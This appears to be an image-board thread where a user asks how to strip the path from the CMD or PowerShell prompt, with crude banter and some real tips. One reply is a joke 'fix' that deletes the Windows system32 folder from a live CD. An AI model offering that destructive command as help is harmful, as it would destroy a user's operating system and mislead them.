How in the SWEET fuck do I permanently get rid of this unnecessary bullshit when using CMD or powershell?
Without installing gentoo of course
There's a way to do it, but I'm too lazy to look it up dess
>>51512723
You don't its necessary.
>>51512738
Bullshit
>>51512723
Enable scripting and crate a powershell profile that changes to the path you want, loads modules and whatever else you want when you open PS
>>51512723
You can't OP.
I'm afraid you'll have to...
>install gentoo
>>51512766
>>51512766
I'm mainly talking about how everytime I run a command or applet or anything, the path I'm working in is displayed.
Basically looking for a way to force enable echo off while keeping the " > " to indicated where I'm typing
>>51512940
>nitpicking bitch
>>51512967
>being anti anal-retentive on /g/
>>51512940
>I'm mainly talking about how everytime I run a command or applet or anything, the path I'm working in is displayed.
>Basically looking for a way to force enable echo off while keeping the " > " to indicated where I'm typing
NOW I've seen everything.
It's possible, but no one who's posted (including myself) knows how.
>>51513133
I do
>>51512723
Function prompt {“>“}
what is PS1?
oh wait. POWERshell.
cd /
>>51512723
you may like this: http://cmder.net/
>>51512723
boot a live cd,
mount /dev/sda1 /mnt
rm -r /mnt/WINDOWS/system32
umount /mnt
then just turn the computer off and do whatever you were trying to accomplish.
>>51514432
epic
>>51512940
so you want it to just say ">", no PS or file path?
...
why?
that is literally the dumbest thing I have ever heard.
>>51512723
What is the "CD" command?